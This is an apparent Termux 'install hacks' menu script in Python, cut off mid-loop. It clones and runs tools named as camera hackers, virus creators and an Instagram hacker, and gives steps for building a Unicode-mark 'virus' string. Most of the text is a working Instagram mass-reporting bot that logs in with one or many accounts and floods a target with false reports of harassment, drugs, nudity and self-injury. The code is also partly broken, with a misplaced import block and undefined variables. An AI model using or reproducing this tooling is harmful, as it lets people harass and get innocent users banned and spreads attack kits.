import os
from os import system, path
import requests,re,os
import sys
from platform import platform
from os import system
from time import sleep
import platform
#palatform()[1]
m = 'clear'
n = 'system'
def mop () :
	print("\t\t[10]ipgeolocation")
os.system ("clear")
gr, r, g, y, b, p, c, w=[
'\033[1;30m',
'\033[1;31m',
'\033[1;32m',
'\033[1;33m',
'\033[1;34m',
'\033[1;35m',
'\033[1;36m',
'\033[1;37m' ]

os.system("clear")
print(r)
os.system("figlet install hacks")
print(r)
print ("             My Insta : 6_zyy")
print(g)
print ("             coded by : mhamed")
print(c)




print ("            P A S S W O R D :    lol")
print(y)

pas = input ("                        --#> : ")
if pas == "lol" :
    print ("OK...")
    print ("                 2-cam_Hackers")
    print(r)
    print ("                 3+Termux-lazyscript")
    print(r)
    print ("                 4-virusdroid-creator")
    print(r)
    print ("                 5-report")
    print(r)
    print ("                 6-VITREX")
    print(r)
    print ("             	7-ip-Tracker")
    print(r)
    print ("                 8-Viruscdcd")
    print(r)
    print("                  9-virousmaker")
    print(r)
    print("                  10-instaband(more)")
    print(r)
    print("                              ------------")
    print("		               [00]  exit")
    print("                              ------------")
    print(r)
    print("                              --------------")
    print ("		              [99] temux fix")
    print("                              --------------")
    print(r)
    print("                              ----------")
    print("                              [100] more")
    print("                              ----------")
    print(r)

else :
    print ("")
	

inp = input ("            --#>:   ")

if inp == "99" :
    os.system("pkg install update -y")
    os.system("pkg install upgrade -y")
    os.system("termux-setup-storag")
    os.system("apt-get update -y")
    os.system("apt-get upgrade -y")
    os.system("apt install php -y")
    os.system("apt install python -y")
    os.system("apt install python2 -y")
    os.system("apt install git -y")
    os.system("apt install golang -y")
    os.system("apt install host -y")
    os.system("apt install nano -y")
    os.system("apt install havij -y")


    os.system("apt install hydra -y")


    os.system("apt install wireshark -y")


    os.system("apt install cmatrix -y")


    os.system("pkg install figlet -y")


    os.system("pkg install wget-y")


    os.system("pkg install wget -y")
    os.system("pkg install python2-dev -y")


    os.system("apt install wireshark -y")


    os.system("pkg install cowsay -y")


    os.system("pkg install toilet -y")


    os.system("pkg install ruby -y")

    os.system("pkg install help -y")


    os.system("gem install lolcat")


    os.system("pkg install curl -y")


    os.system("pkg install wgetrc -y")


    os.system("pkg install unzip -y")


    os.system("pkg install openssh -y")


    os.system("pkg install tor -y")


    os.system("pkg install uzip -y")


    os.system("pkg install net-tools -y")

    os.system("pkg install python2 -y")
    os.system("pkg install cowsay -y")


    os.system("pkg install toilet -y")


    os.system("pkg install ruby -y")

    os.system("pkg install help -y")


    os.system("gem install lolcat")


    os.system("pkg install curl -y")


    os.system("pkg install wgetrc -y")


    os.system("pkg install unzip -y")


    os.system("pkg install openssh -y")


    os.system("pkg install tor -y")


    os.system("pkg install uzip -y")


    os.system("pkg install net-tools -y")


    os.system(" pkg install unrar -y")


    os.system(" pkg install proot -y")


    os.system("pip2 install wget -y")


    os.system("pip2 install requests")


if inp == "00" :
	print (""+col)



if inp == "2" :
	os.system("figlet cam_hacker")
	os.system("pkg install git")
	os.system("pkg instal pyton2")
	os.system("git clone https://github.com/AngelSecurityTeam/Cam-Hackers")
	

if inp == "3" :
	os.system("figlet termux_lazyscript")
	os.system("pkg install git")
	os.system("pkg install python2")
	os.system("pkg install update")
	os.system("git clone https://github.com/TechnicalMujeeb/Termux-Lazyscript.git")
	

if inp == "4" :
	os.system("figlet virusdroid_crator")
	os.system("pkg install git")
	os.system("pkg install python2 -y")
	os.system("git clone https://github.com/saydog/Virus-droid-creator")
	
	
if inp == "5" :
	os.system("figlet report")
	os.system("pkg install git")
	os.system("pkg install python2")
	os.system("pkg install git")
	os.system("git clone https://github.com/IlayTamvan/Report")
	
	
if inp == "6" :
	os.system("figlet VIREX")
	os.system("pkg install git")
	os.system("pkg install python")
	os.system("git clone https://github.com/muhammadfathul/VIRTEX")
	
	
if inp == "7" :
	os.system("figlet ip-Tracer")
	os.system("pkg install git")
	os.system("pkg install python")
	os.system("git clone https://github.com/Rajkumrdusad/IP-Tracer")
	
	
if inp == "8" :
	os.system("Biruscdcd")
	os.system("pkg install git")
	os.system("pkg install python")
	os.system("pkg install openssh")
	os.system("pkg install pip2")
	os.system("git clone https://github.com/amerlaceset/Viruscdcd")

if inp == "9" :
	os.system("clear")
	print(r)
	print("to make this virous you need to download this app teh link: https://play.google.com/store/apps/details?id=com.universapp.asciiconverter")
	print(r)
	print("there a code u type it to make the virous the code is: 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206 8207 8206")
	print(g)
	print("u type it in the ASCll")
	print(g)
	print("before that u type the word u want to make it a virous")

if inp == "10" :
	import requests
import time
import json
import itertools
import threading
import sys
 
done = False
#here is the animation
def animate():
    for c in itertools.cycle(['|', '/', '-', '\\']):
        if done:
            break
        sys.stdout.write('\rloading ' + c)
        sys.stdout.flush()
        time.sleep(0.1)
    sys.stdout.write('\rEnter Login detials! , coded by @v50e~x4xeo     ')
 
t = threading.Thread(target=animate)
 
print("""
   _____                          ____                       
   _____                          ____       
  / ___/____  ____ _____ ___     / __ )__  __
  \__ \/ __ \/ __ `/ __ `__ \   / __  / / / /
 ___/ / /_/ / /_/ / / / / / /  / /_/ / /_/ / 
/____/ .___/\__,_/_/ /_/ /_/  /_____/\__, /  
   _/_/___ __ _  __ __________      /____/   
  | |/ / // /| |/ // ____/ __ \              
  |   / // /_|   // __/ / / / /              
 /   /__  __/   |/ /___/ /_/ /               
/_/|_| /_/ /_/|_/_____/\____/                
 
                                     """)
time.sleep(10)
print("————————————————————————————————————")
print("Follow my instagram @v50e")
print("——————————@v50e————————————————")
t.start()
 
time.sleep(10)
done = True
username = input("Enter username:")
pasword = input("Enter Pasword:")
Target = input("Enter Target:")
r = requests.session()
url = "https://www.instagram.com/accounts/login/ajax/"
headers = {
"accept":"*/*",
"accept-encoding":"gzip, deflate,br",
"accept-language": "ar,en-US;q=0.9,en;q=0.8",
"content-length": "279",
"content-type": "application/x-www-form-urlencoded",
"origin": "https://www.instagram.com",
"referer": "https://www.instagram.com/",
"sec-fetch-dest":"empty",
"sec-fetch-site":"same-origin",
"user-agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36",
"x-csrftoken": "lih2ypMfhzdqwMbm5jIILqxZDj4zLeCW",
"x-ig-app-id": "936619743392459",
"x-ig-www-claim": "hmac.AR1_p9SjMFQF73bcZgzygDgxb9yBZUn83e69xoDD2qpSdmtW",
"x-instagram-ajax":"901e37113a69",
"x-requested-with":"XMLHttpRequest"
}
data = {"username":username,"enc_password":"#PWD_INSTAGRAM_BROWSER:0:1589682409:"+pasword,"queryParams":"{}","optIntoOneTap":"false"}
login = r.post(url,headers=headers,data=data,allow_redirects=True)
if login.text.find("userId") >= 0 :
    print('   [√] Done Login:',username)
    s = requests.get("https://instagram.com/"+Target+"/?__a=1")
    idinsta =str(s.json()["graphql"]["user"]["id"])
    print("[√] id Target:",idinsta)
    data2 = {"source_name":"","reason_id":1,"frx_context":""}
    r.headers.update({'X-CSRFToken': login.cookies['csrftoken']})
    for x in range(100000000):
     spam = "https://www.instagram.com/users/"+idinsta+"/report/"
     spamr = r.post(spam,data=data2)
     if spamr.text.find("Your reports help keep our community free of spam."):
          print("[√] Done Report spam:",Target,' —— @v50e')
          time.sleep(1)
    else:
        print("[-] Error Report spam")
        time.sleep(1)
else:
    if login.text.find("checkpoint_required"):
     print("[-] Error..secure account !")
    else:
         print('[-] Error..worng Pasword') 

if inp == "100" :
	os.system("clear")
	os.system("figlet more...")
	print("there is more")
	k = input("do you want hack insta? : (yes)(no) : ")
if k == "yes" :
	os.system("git clone https://github.com/fuck3erboy/instahack")
	os.system("cd instahack")
	os.system("chmod +x hackinsta.py")
	os.system("python hackinsta.py")
	print("                                ")
if k == "no" :
	p = input("do you want band facebook? : (yes)(no) : ")
if p == "yes" :
	os.system("git clone https://github.com/hekelpro/report-fb")
	os.system("cd report-fb")
	os.system("chmod +x report.py")
	os.system("python report.py")
	
	
print(r)
print("yes or no")
print(r)
m = input("instareport : ")
if m == "no" :
	print ("")
if m == 'yes' :
	lib = input("""
[1] Download lib & update
[2] pass

[+] Please Choice >> """)
 
if lib == "1":
    os.system('pip install requests')
    os.system('pip install datetime')
    os.system('pip install colorama')
    os.system('cls' if os.name == 'nt' else 'clear')
    pass
else:
    os.system('cls' if os.name == 'nt' else 'clear')
    pass
 
 
import requests
import json
import secrets
from colorama import Fore, Style
from time import sleep
from datetime import datetime
 
try:
    os.system('color')
except:
    pass
 
r       = requests.Session()
G       = Fore.GREEN
R       = Fore.RED
Y       = Fore.YELLOW
a       = 0
b       = 0
c       = 0
d       = 0
e       = 0
f       = 0
g       = 0
h       = 0
z       = 0
cookie  = secrets.token_hex(8)*2
time_now= int(datetime.now().timestamp())
 
banner = (G+"""
[!] Coded By : @6_zyy on instagram
 ___ _   _ ____ _____  _    ____  _____ ____   ___  ____ _____ 
|_ _| \ | / ___|_   _|/ \  |  _ \| ____|  _ \ / _ \|  _ \_   _|
 | ||  \| \___ \ | | / _ \ | |_) |  _| | |_) | | | | |_) || |  
 | || |\  |___) || |/ ___ \|  _ <| |___|  __/| |_| |  _ < | |  
|___|_| \_|____/ |_/_/   \_\_| \_\_____|_|    \___/|_| \_\|_|                          
"""+Style.RESET_ALL)
print(banner)
print(G+"="*37+Style.RESET_ALL)
 
def Secure():
    global cookie_jar, csrf_token
    ig_nrcb = cookie_jar['ig_nrcb']
    ig_did = cookie_jar['ig_did']
    mid = cookie_jar['mid']
    sec_url='https://www.instagram.com'+json_login['checkpoint_url']
    head2 = {
        "accept": "*/*",
        "accept-encoding": "gzip, deflate, br",
        "accept-language": "en-US,en;q=0.9",
        "content-type": "application/x-www-form-urlencoded",
        "cookie": 'ig_did='+ig_did+'; ig_nrcb='+ig_nrcb+'; csrftoken='+csrf_token+'; mid='+mid,
        "origin": "https://www.instagram.com",
        "referer": 'https://instagram.com'+json_login['checkpoint_url'],
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "same-origin",
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "x-csrftoken": csrf_token,
        "x-ig-app-id": "936619743392459",
        "x-ig-www-claim": "0",
        "x-instagram-ajax": "e8e20d8ba618",
        "x-requested-with": "XMLHttpRequest"
    }
    code =input(Y+'[+] '+json.loads(requests.post(sec_url, headers=head2, data={'choice': '1'}).text)['extraData']['content'][1]['text']+' : '+Style.RESET_ALL)
    if json.loads(requests.post(sec_url, headers=head2, data={'security_code': code}).text)['type']=='CHALLENGE_REDIRECTION':
        login2 = requests.post(log_url, data=payload, headers=head)
        print(G+'[-] Login Done'+Style.RESET_ALL)
        pass
    else:
        print(R+'[!] Login Failed'+Style.RESET_ALL)
        sleep(3)
        exit()
 
option = input(G+"""
[1] Use one Insta Account
[2] Use Unlimited Account
 
[+] Enter one option : """)
print(G+"="*37+Style.RESET_ALL)
 
if option == '1':
    username = input(Y+'[+] Enter Insta UserName : ')
    password = input(Y+'[+] Enter Insta Password : ')
    url = 'https://www.instagram.com/accounts/login/ajax/'
    headers = {
        "user-agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
        'x-csrftoken': 'missing',
        'mid': cookie
    }
    data = {
        'username':f'{username}',
        'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time_now}:{password}',
        'queryParams': '{}',
        'optIntoOneTap': 'false'
    }
    login = r.post(url, headers=headers, data=data)
    json_login = json.loads(login.text)
    cookies = login.cookies
    cookie_jar = cookies.get_dict()
    try:
        csrf_token = cookie_jar['csrftoken']
    except:
        csrf_token = cookie
    try:
        if 'userId' in login.text:
            r.headers.update({'X-CSRFToken': cookies['csrftoken']})
            print(G+'[-] Login Done'+Style.RESET_ALL)
            pass
        else:
            print(R+'[-] Login Failed'+Style.RESET_ALL)
            sleep(2)
            exit()
    except:
        try:
            if json_login["message"]=="checkpoint_required":
                Secure()
        except KeyError:
            try:
                if json_login["message"]=="checkpoint_required":
                    Secure()
            except:
                print(R+'[-] Login Failed'+Style.RESET_ALL)
                sleep(2)
                exit()
    #########################################################
    TA = input(Y+'[+] Enter User Target : ')
    SL = int(input('[+] Enter Sleep : '))
    R1 = int(input('[+] Enter Count of spam : '))
    R2 = int(input('[+] Enter Count of Harassment : '))
    R3 = int(input('[+] Enter Count of Sale drugs : '))
    R4 = int(input('[+] Enter Count of Violence : '))
    R5 = int(input('[+] Enter Count of Nudity : '))
    R6 = int(input('[+] Enter Count of Hate : '))
    R7 = int(input('[+] Enter Count of Self injury : '))
    R8 = int(input('[+] Enter Count of Me : '))
    print(Style.RESET_ALL)
    #########################################################
    url_id = 'https://www.instagram.com/{}/?__a=1'.format(TA)
    req = r.get(url_id).json()
    idd = str(req['logging_page_id'])
    TA_ID = idd.split('_')[1]
    for i in range(R1):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'1','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            a +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R2):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'7','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            b +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R3):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'3','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            c +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R4):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'5','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            d +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R5):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'4','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            e +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R6):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'6','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            f +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R7):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'2','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            g +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
    for i in range(R8):
        url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
        data1 = {'source_name':'','reason_id':'8','frx_context':''}
        report = r.post(url1,data=data1)
        if '"status": "ok"' in report.text:
            h +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        else:
            z +=1
            os.system('cls' if os.name == 'nt' else 'clear')
            print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
        sleep(SL)
 
elif option == '2':
    #########################################################
    TA = input(Y+'[+] Enter User Target : ')
    R1 = int(input('[+] Enter Count of spam : '))
    R2 = int(input('[+] Enter Count of Harassment : '))
    R3 = int(input('[+] Enter Count of Sale drugs : '))
    R4 = int(input('[+] Enter Count of Violence : '))
    R5 = int(input('[+] Enter Count of Nudity : '))
    R6 = int(input('[+] Enter Count of Hate : '))
    R7 = int(input('[+] Enter Count of Self injury : '))
    R8 = int(input('[+] Enter Count of Me : '))
    print(Style.RESET_ALL)
    #########################################################
    for x in open('Accounts.txt','r').read().splitlines():
        username = x.split(":")[0]
        password = x.split(":")[1]
        url = 'https://www.instagram.com/accounts/login/ajax/'
        headers = {
            "user-agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36",
            'x-csrftoken': 'missing',
            'mid': cookie
        }
        data = {
            'username':f'{username}',
            'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time_now}:{password}',
            'queryParams': '{}',
            'optIntoOneTap': 'false'
        }
        print(Y+f'[-] {username}:{password}'+Style.RESET_ALL)
        login = r.post(url, headers=headers, data=data)
        json_login = json.loads(login.text)
        cookies = login.cookies
        cookie_jar = cookies.get_dict()
        try:
            csrf_token = cookie_jar['csrftoken']
        except:
            csrf_token = cookie
        try:
            if 'userId' in login.text:
                r.headers.update({'X-CSRFToken': cookies['csrftoken']})
                print(G+'[-] Login Done'+Style.RESET_ALL)
                pass
            else:
                print(R+'[-] Login Failed'+Style.RESET_ALL)
                sleep(2)
                exit()
        except:
            try:
                if json_login["message"]=="checkpoint_required":
                    Secure()
            except KeyError:
                try:
                    if json_login["message"]=="checkpoint_required":
                        Secure()
                except:
                    print(R+'[-] Login Failed'+Style.RESET_ALL)
                    sleep(2)
                    exit()
 
        url_id = 'https://www.instagram.com/{}/?__a=1'.format(TA)
        req = r.get(url_id).json()
        idd = str(req['logging_page_id'])
        TA_ID = idd.split('_')[1]
        for i in range(R1):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'1','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                a +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R2):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'7','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                b +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R3):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'3','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                c +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R4):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'5','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                d +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R5):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'4','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                e +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R6):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'6','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                f +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            else:
                z +=1
                os.system('cls' if os.name == 'nt' else 'clear')
                print(f'{banner}\n==============[Free By @O0Dev on Tele]===============\n[-] Spam : {a}\n[-] Harassment : {b}\n[-] Sale Drugs : {c}\n[-] Violence : {d}\n[-] Nudity : {e}\n[-] Hate : {f}\n[-] Self injury : {g}\n[-] Me : {h}\n[-] Error : {z}')
            sleep(0.5)
        for i in range(R7):
            url1 = 'https://www.instagram.com/users/{}/report/'.format(TA_ID)
            data1 = {'source_name':'','reason_id':'2','frx_context':''}
            report = r.post(url1,data=data1)
            if '"status": "ok"' in report.text:
                g +=1
                os.system('cls' if os.name == 'nt' else 'clear')
